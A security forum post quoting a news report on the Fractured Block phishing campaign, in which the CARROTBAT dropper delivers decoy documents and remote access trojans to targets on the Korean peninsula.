Phishing campaign spreading CARROTBAT dropper focuses on cryptocurrency...
#1
Quote:A phishing campaign targeting the Korean peninsula is using a malicious dropper called CARROTBAT to deliver decoy documents and secondary payloads such as remote access trojans to its victims.

Dubbed Fractured Block, the campaign began last March, but has noticeably picked up steam in the last three months, according to a blog post by Josh Grunzweig and Kyle Wilhoit, researchers at Palo Alto Networks’ Unit 42 division.

Unit 42 has so far identified 29 unique CARROTBAT samples, noting that their final payloads have varied between the FTP-based RAT SYSCON and the recently discovered Oceansalt malware implant that uses code associated with APT1 (aka Comment Crew), a reputed Chinese APT actor.

Unit 42 describes CARROTBAT as “a dropper that allows an attacker to drop and open an embedded decoy file” saved as one of 11 different formats, “followed by the execution of a command that will download and run a payload on the targeted machine. This command will attempt to download and execute a remote file via the Microsoft Windows built-in certutil utility.”

Source: https://www.scmagazine.com/home/security...interests/
[-] The following 1 user says Thank You to silversurfer for this post:
  • harlan4096
Reply


Messages In This Thread
Phishing campaign spreading CARROTBAT dropper focuses on cryptocurrency... - by silversurfer - 30 November 18, 18:11

Forum Jump:


Users browsing this thread: 1 Guest(s)
[-]
Welcome
You have to register before you can post on our site.

Username/Email:


Password:





[-]
Recent Posts
AdGuard v4.5.8 for iOS
AdGuard v4.5.8 for...harlan4096 — 09:45
Hasleo Backup Suite 5.0.1
Hasleo Backup Suit...harlan4096 — 09:44
GFYI [Official] Ashampoo Christmas 2024...
Merry Christmas and ...Decimuss — 09:32
GFYI [Official] 'AntGROUP Inc. / VCap-d...
Merry Christmas and ...Decimuss — 09:24
GFYI [Official] SpyShelter PRO v15 Chri...
Merry Christmas and ...Decimuss — 09:14

[-]
Birthdays
Today's Birthdays
avatar (47)trideMup
avatar (45)dinatx11
avatar (55)Sk1n1m1n
avatar (37)Mbobbleheads
avatar (55)earthinvestindia
avatar (55)narenonnet
avatar (55)yosepyap10
avatar (55)rwat67
avatar (37)arkabafamilydental
avatar (55)naiduranga077
avatar (55)indianagirl270
avatar (37)fotohandyhuellegeschenk
avatar (55)VW01
avatar (30)claradsouza
avatar (55)MrHumanGuy
avatar (55)chilcuttjc01
Upcoming Birthdays
avatar (49)theoldevext
avatar (44)algratCep
avatar (49)Qlaude2Sap
avatar (40)pieleatisDilia
avatar (42)ilyavvop
avatar (37)urytog
avatar (37)bubblewrapsuit2018
avatar (43)tabthinLem
avatar (38)ixofehym
avatar (50)Josepharelf
avatar (39)kholukrefar
avatar (48)Lauraimike
avatar (50)WilsonWag
avatar (48)StevenPiole
avatar (39)zetssToomy
avatar (46)GornOr
avatar (44)StephenViedy
avatar (46)tuebrUNure
avatar (39)alexeytsa4721
avatar (49)Jamesmog
avatar (37)opeqyrav
avatar (38)theatidere
avatar (47)denisEquivok
avatar (35)mikebrian01
avatar (37)ivanoFloom
avatar (41)Tyreeplurb
avatar (40)uxegihor

[-]
Online Staff
There are no staff members currently online.

>